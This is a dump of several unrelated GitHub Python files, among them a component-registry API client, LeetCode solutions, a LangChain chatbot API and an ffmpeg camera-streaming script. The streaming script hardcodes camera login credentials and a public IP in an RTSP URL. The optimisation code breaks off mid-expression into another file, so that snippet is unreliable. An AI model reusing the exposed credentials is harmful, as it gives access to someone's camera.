requires access to the IDF component registry. '\n                        'However, the registry URL is not set. You can set the '\n                        'IDF_COMPONENT_REGISTRY_URL environment variable or \"registry_url\" field '\n                        'for your current profile in \"idf_component_manager.yml\" file. 
'\n 'To use the default IDF component registry '\n 'unset IDF_COMPONENT_STORAGE_URL environment variable or remove '\n '\"storage_url\" field from the \"idf_component_manager.yml\" file'\n )\n\n session = create_session(cache=cache, token=self.auth_token)\n\n def request(method, path, data=None, json=None, headers=None, schema=None):\n if use_storage:\n path[-1] += '.json'\n return self._base_request(\n url,\n session,\n method,\n path,\n data=data,\n json=json,\n headers=headers,\n schema=schema,\n use_storage=use_storage,\n )\n\n return f(self, request=request, *args, **kwargs)\n\n return wrapper\n\n return decorator\n\n @_request(cache=True)\n def api_information(self, request):\n return request('get', [], schema=API_INFORMATION_SCHEMA)\n\n @auth_required\n @_request(cache=False)\n def token_information(self, request):\n return request('get', ['tokens', 'current'], schema=API_TOKEN_SCHEMA)\n\n @_request(cache=True, use_storage=True)\n def versions(self, request, component_name, spec='*'):\n \"\"\"List of versions for given component with required spec\"\"\"\n\n component_name = component_name.lower()\n semantic_spec = SimpleSpec(spec or '*')\n body = _component_request(request, component_name)\n\n versions = []\n for version in body['versions']:\n if not semantic_spec.match(Version(version['version'])):\n continue\n\n all_build_keys_known = True\n if version.get('build_metadata_keys', None) is not None:\n for build_key in version.get('build_metadata_keys'):\n if build_key not in BUILD_METADATA_KEYS:\n all_build_keys_known = False\n break\n\n if all_build_keys_known:\n versions.append((version, all_build_keys_known))\n\n return tools.manifest.ComponentWithVersions(\n name=component_name,\n versions=[\n tools.manifest.HashedComponentVersion(\n version_string=version['version'],\n component_hash=version['component_hash'],\n dependencies=self._version_dependencies(version),\n targets=version['targets'],\n all_build_keys_known=all_build_keys_known,\n )\n for version, all_build_keys_known in versions\n ],\n )\n\n @_request(cache=True, use_storage=True)\n def component(self, request, component_name, version=None):\n \"\"\"\n Manifest for given version of component, if version is None highest version is returned\n \"\"\"\n\n component_name = component_name.lower()\n response = _component_request(request, component_name)\n versions = response['versions']\n filtered_versions = filter_versions(versions, version, component_name)\n\n if not filtered_versions:\n raise VersionNotFound(\n 'Version of the component \"{}\" satisfying the spec \"{}\" was not found.'.format(\n component_name, str(version)\n )\n )\n\n best_version = max(filtered_versions, key=lambda v: Version(v['version']))\n download_url = join_url(self.storage_url, best_version['url'])\n\n documents = best_version['docs']\n for document, url in documents.items():\n documents[document] = join_url(self.storage_url, url)\n\n license_info = best_version['license']\n if license_info:\n license_info['url'] = join_url(self.storage_url, license_info['url'])\n\n examples = best_version['examples']\n for example in examples:\n example.update({'url': join_url(self.storage_url, example['url'])})\n\n return ComponentDetails(\n name=('%s/%s' % (response['namespace'], response['name'])),\n version=tools.manifest.ComponentVersion(best_version['version']),\n dependencies=self._version_dependencies(best_version),\n maintainers=None,\n download_url=download_url,\n documents=documents,\n license=license_info,\n examples=examples,\n )\n\n def 
_upload_version_to_endpoint(self, request, file_path, endpoint):\n with open(file_path, 'rb') as file:\n filename = os.path.basename(file_path)\n\n encoder = MultipartEncoder({'file': (filename, file, 'application/octet-stream')})\n headers = {'Content-Type': encoder.content_type}\n\n progress_bar = tqdm(total=encoder.len, unit_scale=True, unit='B', disable=None)\n\n def callback(\n monitor, memo={'progress': 0}\n ): # type: (MultipartEncoderMonitor, dict) -> None\n progress_bar.update(monitor.bytes_read - memo['progress'])\n memo['progress'] = monitor.bytes_read\n\n data = MultipartEncoderMonitor(encoder, callback)\n\n try:\n return request(\n 'post',\n endpoint,\n data=data,\n headers=headers,\n schema=VERSION_UPLOAD_SCHEMA,\n )['job_id']\n finally:\n progress_bar.close()\n\n @auth_required\n @_request(cache=False)\n def upload_version(self, request, component_name, file_path):\n return self._upload_version_to_endpoint(\n request, file_path, ['components', component_name.lower(), 'versions']\n )\n\n @_request(cache=False)\n def validate_version(self, request, file_path):\n return self._upload_version_to_endpoint(request, file_path, ['components', 'validate'])\n\n @auth_required\n @_request(cache=False)\n def delete_version(self, request, component_name, component_version):\n request('delete', ['components', component_name.lower(), component_version])\n\n @auth_required\n @_request(cache=False)\n def yank_version(self, request, component_name, component_version, yank_message):\n request(\n 'post',\n ['components', component_name.lower(), component_version, 'yank'],\n json={'message': yank_message},\n )\n\n @_request(cache=False)\n def task_status(self, request, job_id): # type: (Callable, str) -> TaskStatus\n body = request('get', ['tasks', job_id], schema=TASK_STATUS_SCHEMA)\n return TaskStatus(\n body['message'], body['status'], body['progress'], body.get('warnings', [])\n )\n","repo_name":"espressif/idf-component-manager","sub_path":"idf_component_tools/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"79"} +{"seq_id":"20296232298","text":"#!/usr/bin/env python\n\"\"\"\n\nCode care of https://github.com/amueller wordcloud conda package.\nto install : pip install wordcloud or conda install -c https://conda.anaconda.org/amueller wordcloud\n\nREQUIREMENTS: PIL\n\n\"\"\"\nimport sys, os\nimport welcome_flask3 as flaskapp\n\n#import libraries for generating the wordcloud\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS#, ImageColorGenerator\nimport random\n\n\ndef prep_KWcloud():\n '''\n : param NONE\n : output : Returns a single string of keywords found in the given database.\n '''\n m, data_frame = flaskapp.getPapersKWgroup('paperID')\n entries = \"\"\n for each in data_frame.groups:\n \n entry = \" \".join([key.replace (\" \", \"_\") for key in data_frame.get_group(each)['keyword']])\n \n entries = \" \".join((entries, entry))\n return entries\n\ndef prep_Aucloud():\n \n data_frame = flaskapp.getAuthorsTotal()\n entries = ''\n for each in data_frame.authorName:\n entries = \" \".join((entries, each.strip().replace(', ', '_').replace(' ', '_')))\n \n return entries\n\ndef cloud(cloudtext, outputfile = 'Images/cloud.png'):\n '''\n : param NONE\n : output : Returns a saved .png file of the generated wordcloud. 
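The `_upload_version_to_endpoint` helper above streams a tarball with requests_toolbelt's multipart encoder and reports progress through tqdm. A minimal standalone sketch of the same pattern, assuming requests_toolbelt and tqdm are installed; the URL is a placeholder, not a real endpoint:

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder, MultipartEncoderMonitor
from tqdm import tqdm

def upload_with_progress(path, url='https://example.com/upload'):  # placeholder URL
    with open(path, 'rb') as f:
        encoder = MultipartEncoder({'file': (path, f, 'application/octet-stream')})
        bar = tqdm(total=encoder.len, unit='B', unit_scale=True)

        def callback(monitor, memo={'read': 0}):
            # monitor.bytes_read is cumulative; tqdm.update wants deltas
            bar.update(monitor.bytes_read - memo['read'])
            memo['read'] = monitor.bytes_read

        monitor = MultipartEncoderMonitor(encoder, callback)
        try:
            return requests.post(url, data=monitor,
                                 headers={'Content-Type': monitor.content_type})
        finally:
            bar.close()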
Creating/saving\n a new image eachtime.\n \n '''\n runcloud = {'kw' : prep_KWcloud(),\n 'au' : prep_Aucloud()\n }\n #IF WANT TO ADD CERTAIN WORDS TO BE EXCLUDED>>>\n #stopwords = set(STOPWORDS)\n #stopwords.add(\"said\")\n \n #generate a single string of ALL the keywords!\n text = runcloud[cloudtext]\n\n #wc.generate(text)\n #Image from : https://lifebeinghusky.files.wordpress.com/2010/02/paw.jpg\n NortheasternHusky = np.array(Image.open(\"static/Images/paw.jpg\"))\n \n # take relative word frequencies into account, lower max_font_size\n wc = WordCloud(background_color=\"white\", \n max_font_size=40, \n relative_scaling=.5, \n mask=NortheasternHusky).generate(text)\n\n plt.figure()\n #plt.imshow(wc)\n plt.axis(\"off\")\n #plt.show()\n # store Image?\n wc.to_file(outputfile)\n \n return wc\n\n","repo_name":"noveroa/DataBases","sub_path":"Flask/app/drafts/wcg/wordcloud_generator.py","file_name":"wordcloud_generator.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3438502727","text":"class Solution:\n def maxProbability(self, n: int, edges: List[List[int]], succProb: List[float], start: int, end: int) -> float:\n \n graph = [[] for _ in range(n)]\n for i, (a, b) in enumerate(edges):\n prob = succProb[i]\n graph[a].append((b, prob))\n graph[b].append((a, prob))\n \n dist = [0] * n\n dist[start] = 1.0\n \n pq = [(-1.0, start)]\n heapq.heapify(pq)\n \n while pq:\n prob, node = heapq.heappop(pq)\n prob *= -1.0\n \n if node == end:\n return prob\n \n if prob < dist[node]:\n continue\n \n for neighbor, edge_prob in graph[node]:\n new_prob = prob * edge_prob\n if new_prob > dist[neighbor]:\n dist[neighbor] = new_prob\n heapq.heappush(pq, (-new_prob, neighbor))\n \n return 0.0\n","repo_name":"ranilmukesh/daily-leetcode-hard-solutions-using-python","sub_path":"1514. Path with Maximum Probability.py","file_name":"1514. 
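The word-cloud record above shapes its output with an image mask. A minimal sketch of that WordCloud usage, assuming the wordcloud package is installed and 'paw.jpg' stands in for any local mask image:

import numpy as np
from PIL import Image
from wordcloud import WordCloud

mask = np.array(Image.open('paw.jpg'))  # hypothetical local mask image
text = 'database index query index join query query'
wc = WordCloud(background_color='white', max_font_size=40,
               relative_scaling=0.5, mask=mask).generate(text)
wc.to_file('cloud.png')  # writes the rendered cloud as a PNG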
Path with Maximum Probability.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24429497998","text":"import subprocess\nimport cv2\nimport threading\nimport numpy as np\nimport imutils\nimport multiprocessing\nimport os, shutil\n\n\nfps = 30\nwidth = 400\nheight = 800\n\ncommand1 = ['ffmpeg',\n '-y',\n '-re',\n '-f', 'rawvideo',\n '-vcodec', 'rawvideo',\n '-pix_fmt', 'bgr24',\n '-s', \"{}x{}\".format(width, height),\n '-r', str(fps),\n '-i', '-',\n '-pix_fmt', 'yuv420p',\n # '-r', '30',\n '-g', '50',\n '-crf', '21',\n '-c:v', 'libx264', \n '-b:v', '2M',\n '-bufsize', '64M',\n '-maxrate', \"4M\",\n '-preset', 'veryfast',\n # '-rtsp_transport', 'tcp',\n # '-segment_times', '5',\n # '-f', 'rtsp',\n # 'rtsp://65.1.134.231:8554/mystream',\n '-sc_threshold', '0',\n '-start_number','0',\n '-hls_time','6',\n '-hls_list_size','0',\n # '-hls_flags', 'delete_segments',\n # '-hls_flags' ,'+append_list',\n # '-hls_flags' ,'+discont_start',\n '-hls_flags', '+program_date_time',\n '-hls_playlist_type', 'event',\n # '-hls_flags', 'single_file',\n # '-f','hls',\n # '-segment_list_flags', '+live',\n # '-segment_wrap', '6',\n # 'media/cam1/hsl.m3u8'\n r'C:\\Users\\Kaamil\\Documents\\enturf-compression\\media\\cam1\\hsl.m3u8'\n ]\n\n# command2 = ['ffmpeg',\n# '-y',\n# '-re',\n# '-f', 'rawvideo',\n# '-vcodec', 'rawvideo',\n# '-pix_fmt', 'bgr24',\n# '-s', \"{}x{}\".format(width, height),\n# '-r', str(fps),\n# '-i', '-',\n# '-pix_fmt', 'yuv420p',\n# '-r', '30',\n# '-g', '50',\n# '-c:v', 'libx264',\n# '-b:v', '2M',\n# '-bufsize', '64M',\n# '-maxrate', \"4M\",\n# '-preset', 'veryfast',\n# '-rtsp_transport', 'tcp',\n# '-segment_times', '5',\n# '-f', 'rtsp',\n# 'rtsp://localhost:8554/mystream2',\n# # '-start_number','0',\n# # '-hls_time','1',\n# # '-hls_list_size','0',\n# # '-f','hls',\n# # r'C:\\Users\\Kaamil\\Documents\\enturf-compression\\media\\cam2\\hsl'\n# ]\n\np = subprocess.Popen(command1, stdin=subprocess.PIPE)\n# p2 = subprocess.Popen(command2, stdin=subprocess.PIPE)\n\n\n\nclass PlayCamera(object):\n def __init__(self,value):\n self.video = value\n (self.grabbed, self.frame) = self.video.read()\n threading.Thread(target=self.update, args=()).start()\n def __del__(self):\n self.video.release()\n def get_frame(self):\n image = self.frame\n return image\n def update(self):\n while True:\n (self.grabbed, self.frame) = self.video.read() \n\ndef gen(camera,p):\n greenLower = (29, 86, 6)\n greenUpper = (64, 255, 255)\n # greenLower = (0, 166, 0)\n # greenUpper = (25, 255, 255)\n while True:\n frame = camera.get_frame()\n\n frame = imutils.resize(frame, width=600)\n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv, greenLower, greenUpper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL,\n cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n center = None\n\n if len(cnts) > 0:\n\n c = max(cnts, key=cv2.contourArea)\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n if radius > 5:\n\n cv2.circle(frame, (int(x), int(y)), int(radius),\n (0, 255, 255), 2)\n cv2.circle(frame, center, 5, (0, 0, 255), -1)\n\n if center:\n start_val=center[0]-100\n End_val=center[0]+100\n if start_val<0:\n End_val=End_val-start_val\n start_val=0\n if 
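The record above (LeetCode 1514) runs Dijkstra on success probabilities, negating them so Python's min-heap pops the most probable node first and multiplying edge probabilities instead of adding weights. A compact restatement, checked against the example from the problem statement:

import heapq

def max_probability(n, edges, succ_prob, start, end):
    graph = [[] for _ in range(n)]
    for (a, b), p in zip(edges, succ_prob):
        graph[a].append((b, p))
        graph[b].append((a, p))
    best = [0.0] * n
    best[start] = 1.0
    heap = [(-1.0, start)]          # negate so the min-heap acts as a max-heap
    while heap:
        prob, node = heapq.heappop(heap)
        prob = -prob
        if node == end:
            return prob
        if prob < best[node]:
            continue                # stale heap entry, skip
        for nxt, p in graph[node]:
            cand = prob * p
            if cand > best[nxt]:
                best[nxt] = cand
                heapq.heappush(heap, (-cand, nxt))
    return 0.0

# The two-hop path 0 -> 1 -> 2 (0.5 * 0.5 = 0.25) beats the direct 0.2 edge.
assert max_probability(3, [[0, 1], [1, 2], [0, 2]], [0.5, 0.5, 0.2], 0, 2) == 0.25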
End_val>600:\n start_val=start_val-End_val\n End_val=600\n cropped_image=frame[0:,start_val:End_val]\n else:\n cropped_image=frame[0:,200:400]\n \n resize=cv2.resize(cropped_image,(400,800))\n\n\n p.stdin.write(resize.tobytes())\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n \ndef cam1_start():\n folder = 'media/cam1/'\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n value=cv2.VideoCapture('rtsp://admin:user@123@49.207.177.194:10554/Streaming/Channels/101')\n # value=cv2.VideoCapture('rtsp://49.207.177.194:8011/h264_ulaw.sdp')\n cam = PlayCamera(value)\n gen(cam,p)\n\n\n# def cam2_start():\n# value=cv2.VideoCapture('rtsp://admin:user@123@169.254.17.246:554/Streaming/Channels/101')\n# cam = PlayCamera(value)\n# gen(cam,p2)\n\n# cam1_start()\n# cam2_start()\n\n# if __name__ == '__main__':\n\n# threading(target = cam1_start).start()\n# threading(target = cam2_start).start()\n# while True:\n# time.sleep(5)\n\n\nif __name__ == \"__main__\":\n # creating processes\n p1 = multiprocessing.Process(target=cam1_start, args=())\n # p2 = multiprocessing.Process(target=cam2_start, args=( ))\n\n p1.start()\n # p2.start()\n ","repo_name":"Madurai-coders/enturf-compression","sub_path":"test_B_trail_1.py","file_name":"test_B_trail_1.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7994130621","text":"# https://leetcode.com/problems/minimum-cost-to-make-at-least-one-valid-path-in-a-grid/\n\nfrom typing import *\n\nINF = 10 ** 10\n\nmx = [1, -1, 0, 0]\nmy = [0, 0, 1, -1]\n\nclass Solution:\n def minCost(self, grid: List[List[int]]) -> int:\n self.n = len(grid)\n self.m = len(grid[0])\n\n self.dis = [[INF for j in range(self.m)] for i in range(self.n)]\n\n self.dis[0][0] = 0\n self.q = [(0, 0)]\n self.visit = set([(0, 0)])\n\n while self.q:\n cur = self.q.pop(0)\n self.visit.remove(cur)\n\n y, x = cur\n for i in range(4):\n ny = y + my[i]\n nx = x + mx[i]\n nc = self.dis[y][x] + (0 if i == grid[y][x] - 1 else 1)\n\n if 0 <= ny < self.n and 0 <= nx < self.m:\n if nc < self.dis[ny][nx]:\n self.dis[ny][nx] = nc\n if (ny, nx) not in self.visit:\n self.visit.add((ny, nx))\n self.q.append((ny, nx))\n res = self.dis[self.n - 1][self.m - 1]\n return res\n\nS = Solution()\n\nassert(S.minCost([[1,1,3],[3,2,2],[1,1,4]]) == 0)\nassert(S.minCost([[1,1,1,1],[2,2,2,2],[1,1,1,1],[2,2,2,2]]) == 3)\nassert(S.minCost([[1,2],[4,3]]) == 1)\nassert(S.minCost([[4]]) == 0)\n","repo_name":"Wizmann/ACM-ICPC","sub_path":"Leetcode/Algorithm/python/2000/01368-Minimum Cost to Make at Least One Valid Path in a Grid.py","file_name":"01368-Minimum Cost to Make at Least One Valid Path in a Grid.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"79"} +{"seq_id":"10643137712","text":"import numpy as np\r\nclass Multivariate_Optimization:\r\n def __init__(self,start,direction,range):\r\n self.start=np.array(start)\r\n self.direction=np.array(direction)\r\n self.range=range\r\n \r\n def bracketing(self,N,fn):\r\n for i in range(N-2):\r\n #print(\"ROUND\",i)\r\n if fn(self.w_all[i]) >= fn(self.w_all[i+1]) <= fn(self.w_all[i+2]):\r\n #print(\"ROUND\",i)\r\n return 
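The minCost record above (LeetCode 1368) relaxes grid edges through a plain FIFO queue, an SPFA-style search. Because every move costs either 0 (the cell already points that way) or 1 (override its sign), the same problem also fits 0-1 BFS on a deque — a different technique from the record, sketched here and checked against the record's own test cases:

from collections import deque

DIRS = {1: (0, 1), 2: (0, -1), 3: (1, 0), 4: (-1, 0)}  # sign value -> (dy, dx)

def min_cost(grid):
    n, m = len(grid), len(grid[0])
    dist = [[float('inf')] * m for _ in range(n)]
    dist[0][0] = 0
    dq = deque([(0, 0)])
    while dq:
        y, x = dq.popleft()
        for sign, (dy, dx) in DIRS.items():
            ny, nx = y + dy, x + dx
            if 0 <= ny < n and 0 <= nx < m:
                w = 0 if grid[y][x] == sign else 1
                if dist[y][x] + w < dist[ny][nx]:
                    dist[ny][nx] = dist[y][x] + w
                    # free moves go to the front so the deque stays ordered
                    (dq.appendleft if w == 0 else dq.append)((ny, nx))
    return dist[n - 1][m - 1]

assert min_cost([[1, 1, 3], [3, 2, 2], [1, 1, 4]]) == 0
assert min_cost([[1, 2], [4, 3]]) == 1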
np.array([self.w_all[i],self.w_all[i+2]]),i\r\n \r\n if fn(self.w_all[0]) > fn(self.w_all[-1]):\r\n print(f\"Highest Value at {self.w_all[0]}\")\r\n return self.w_all[0]\r\n else:\r\n print(f\"Highest Value at {self.w_all[-1]}\")\r\n return self.w_all[-1]\r\n\r\n def region_elimination(self, range, e, fn):\r\n a= range[0]\r\n b= range[1]\r\n #print(a,b)\r\n #print((a-b)/4)\r\n L = (b-a)/4\r\n #print(f\"L:{L}\")\r\n\r\n if abs(np.average(L))= 10:\n break\n return hashtags_list\n\nif __name__ == '__main__':\n L = Instaloader()\n print('Write post link here:')\n SHORTCODE = input()\n POST = Post.from_shortcode(L.context, SHORTCODE)\n print(get_hashtags(POST))\n ","repo_name":"e2tovar/instatools","sub_path":"get_post_hashtags.py","file_name":"get_post_hashtags.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"21659833650","text":"from fastapi import FastAPI, HTTPException, Request\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom langchain.document_loaders import TextLoader\nfrom langchain.text_splitter import CharacterTextSplitter, RecursiveCharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.chains import RetrievalQAWithSourcesChain\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.vectorstores import Chroma\nimport sqlite3\n\n\n#Import GIKIAN...\nimport os\nos.environ[\"OPENAI_API_KEY\"] = \"OPENAI_API_KEY\"\n\n#Scraped data\nwith open('./cleanScrape.txt') as f:\n documents = f.read()\n\ntext_splitter = RecursiveCharacterTextSplitter(\n chunk_size = 1000,\n chunk_overlap = 0,\n length_function = len, )\n\ntexts = text_splitter.create_documents([documents])\n\nlen(texts)\n\n# Embeddings\nembeddings = OpenAIEmbeddings()\ndb = FAISS.from_documents(texts, embeddings)\n\n#Database storing\n\nllm=ChatOpenAI(temperature=0, model_name='gpt-3.5-turbo')\n\nchain = load_qa_chain(llm, chain_type=\"stuff\")\n\ndef get_similar_documents(query):\n docs = db.similarity_search(query)\n return docs\n\ndef get_chatbot_response(question, docs):\n response = chain.run(input_documents=docs, question=question)\n return response\n\ndef insert_into_database(query, response):\n cursor.execute('INSERT INTO chatbot_history (query, chatbot_response) VALUES (?, ?)', (query, response))\n conn.commit()\n\n\n# Connect to the SQLite database on Google Drive\ndatabase_path = \"database.db\"\nconn = sqlite3.connect(database_path)\ncursor = conn.cursor()\n\napp = FastAPI()\n\nfrom fastapi.middleware.cors import CORSMiddleware\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Mount the static files directory\napp.mount(\"/templates\", StaticFiles(directory=\"templates\"), name=\"templates\")\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def read_index(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\nprint(\"Debugging\")\n\nfrom typing import List\nfrom pydantic import BaseModel\n\nclass ChatMessage(BaseModel):\n role: str\n content: str\n\n@app.post(\"/api/chatbot\")\nasync def chat_with_bot(message: ChatMessage):\n query = message.content\n relevant_docs = get_similar_documents(query)\n 
chatbot_response = get_chatbot_response(query, relevant_docs)\n insert_into_database(query, chatbot_response)\n\n return {\"response\": chatbot_response}\n\n","repo_name":"RaoEhsanElahi/Musk-AI-Internship","sub_path":"GIKIAN_ChatBot/Backend_API/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26759879966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 14 17:40:13 2017\n\n@author: Juan Antonio Barragán Noguera\n@email: jabarragann@unal.edu.co\n\n\"\"\"\n\nfrom itertools import product\n\nfile=open(\"04_MaximazeIt3.txt\",\"r\")\n\nargArray= file.readline().split(\" \")\n\nnumberOfLines=int(argArray[0])\nmodNumber=int(argArray[1])\n\narrays=[]\nfor i in range(numberOfLines):\n argArray=file.readline().split(\" \")\n temp=[]\n for i in argArray:\n temp.append(int(i)) \n \n arrays.append(temp)\n\n\nproduct1=list(product(*arrays))\n\nmaxNumb=0\nfor arg in product1:\n sum1=0\n for item in arg:\n sum1=sum1+item**2\n result=sum1%modNumber\n if result > maxNumb:\n maxNumb=result\n \nprint(\"Answer is: \"+ str(maxNumb))\n\nfile.close()\n","repo_name":"jabarragann/HackerRankChallenges","sub_path":"Python/Itertools/04_MaximazeIt.py","file_name":"04_MaximazeIt.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19126415861","text":"from RulesetComparer.date_model.json_parser.permission import PermissionParser\nfrom RulesetComparer.models import ReportSchedulerInfo\nfrom permission.utils.permission_manager import *\nfrom common.data_object.error.error import PermissionDeniedError\n\n\nclass UpdateReportSchedulerStatusParser(PermissionParser):\n def __init__(self, json_data, user):\n try:\n self.user = user\n self.task_id = json_data.get(KEY_TASK_ID)\n self.task = ReportSchedulerInfo.objects.get(id=self.task_id)\n\n self.enable = json_data.get(KEY_ENABLE)\n if self.enable:\n self.enable = 1\n else:\n self.enable = 0\n PermissionParser.__init__(self)\n except Exception as e:\n raise e\n\n def check_permission(self):\n function_id = Function.objects.get(name=KEY_F_REPORT_TASK, module__name=KEY_M_RULESET).id\n\n for country_id_obj in self.task.country_list.values(KEY_ID):\n country_id = country_id_obj.get(KEY_ID)\n is_base_editable = is_editable(self.user.id, self.task.base_environment.id, country_id, function_id)\n is_target_editable = is_editable(self.user.id, self.task.compare_environment.id, country_id, function_id)\n\n if is_base_editable is False or is_target_editable is False:\n raise PermissionDeniedError()\n","repo_name":"wendywu-taiwan/conf-mgt-tool-light","sub_path":"RulesetComparer/date_model/json_parser/update_report_scheduler_status.py","file_name":"update_report_scheduler_status.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18773420696","text":"\"\"\"\ndata_ingestion\n\nTakes a path as input along with pipeline name and the interpreter name\nReads the dataset using the said pipeline's specified interpreter\nIf the interpreter raises no errors, the path is copied into datasets\nIf any errrors occur or assertions fail, path is rejected\n\"\"\"\nfrom distutils.dir_util import copy_tree\nimport traceback\nimport os\nimport datetime\n\nfrom constants import DATASET_DIR\nfrom pipeline_input import pipeline_input\n\ndef ingest_data(p_input: 
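The chatbot record above implements retrieval-augmented generation: split the text, embed the chunks into FAISS, retrieve the nearest chunks per query, and hand them to a QA chain. The retrieval half in isolation, using the same langchain calls as the record (an OPENAI_API_KEY must be set; the sample sentence is illustrative):

from langchain.embeddings import OpenAIEmbeddings
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.vectorstores import FAISS

splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
docs = splitter.create_documents(['GIKI admissions open in July. Hostels are on campus.'])
db = FAISS.from_documents(docs, OpenAIEmbeddings())  # embeds and indexes the chunks
hits = db.similarity_search('When do admissions open?', k=1)
print(hits[0].page_content)  # the chunk most similar to the question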
pipeline_input, INTERPRETER_NAME: str, input_dir: str, validate_only=False):\n\tassert isinstance(p_input, pipeline_input)\n\tdataset_interp_class = p_input.get_pipeline_dataset_interpreter_by_name(INTERPRETER_NAME)\n\tpipeline_name = p_input.get_pipeline_name()\n\tPIPELINE_BASE_FOLDER = DATASET_DIR.format(pipeline_name=pipeline_name)\n\tos.makedirs(PIPELINE_BASE_FOLDER, exist_ok=True)\n\tBASE_FOLDER_ID = os.path.join(PIPELINE_BASE_FOLDER, INTERPRETER_NAME, str(datetime.datetime.now()).replace(\" \", \"_\"))\n\ttry:\n\t\tdat = dataset_interp_class(input_dir)\n\t\tprint(\"Interpreter accepted\")\n\t\tif not validate_only:\n\t\t\tprint(\"COPYING...\")\n\t\t\tprint(input_dir, '->',BASE_FOLDER_ID)\n\t\t\tos.makedirs(BASE_FOLDER_ID, exist_ok=True)\n\t\t\tcopy_tree(input_dir, BASE_FOLDER_ID)\n\t\telse:\n\t\t\tprint(dat.get_dataset())\n\texcept AssertionError as ex:\n\t\tprint(\"Interpreter rejected, aborting...\")\n\t\tprint(ex)\n\t\ttraceback.print_exc()\n\n\nif __name__==\"__main__\":\n\tfrom all_pipelines import get_all_inputs\n\tall_inputs = get_all_inputs()\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--input_dir', type=str, required=True)\n\tparser.add_argument('--pipeline_name', type=str, required=True)\n\tparser.add_argument('--interpreter_name', type=str, required=True)\n\tparser.add_argument('--validate_only', action='store_true')\n\targs = parser.parse_args()\n\tingest_data(all_inputs[args.pipeline_name], args.interpreter_name, args.input_dir, args.validate_only)\n","repo_name":"Kora-Scenes/ML_Ops_Pipeline","sub_path":"ML_Ops_Pipeline/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20150119732","text":"\"\"\"APIs for running MLflow projects locally or remotely.\"\"\"\n\nfrom __future__ import print_function\n\nfrom distutils import dir_util\nimport hashlib\nimport json\nimport os\nimport re\nimport subprocess\nimport tempfile\n\nfrom mlflow.projects.submitted_run import LocalSubmittedRun\nfrom mlflow.projects import _project_spec\nfrom mlflow.utils.exception import ExecutionException\nfrom mlflow.entities import RunStatus, SourceType, Param\nimport mlflow.tracking as tracking\nfrom mlflow.tracking.fluent import _get_experiment_id, _get_git_commit\n\n\nfrom mlflow.utils import process\nfrom mlflow.utils.logging_utils import eprint\n\n# TODO: this should be restricted to just Git repos and not S3 and stuff like that\n_GIT_URI_REGEX = re.compile(r\"^[^/]*:\")\n# Environment variable indicating a path to a conda installation. 
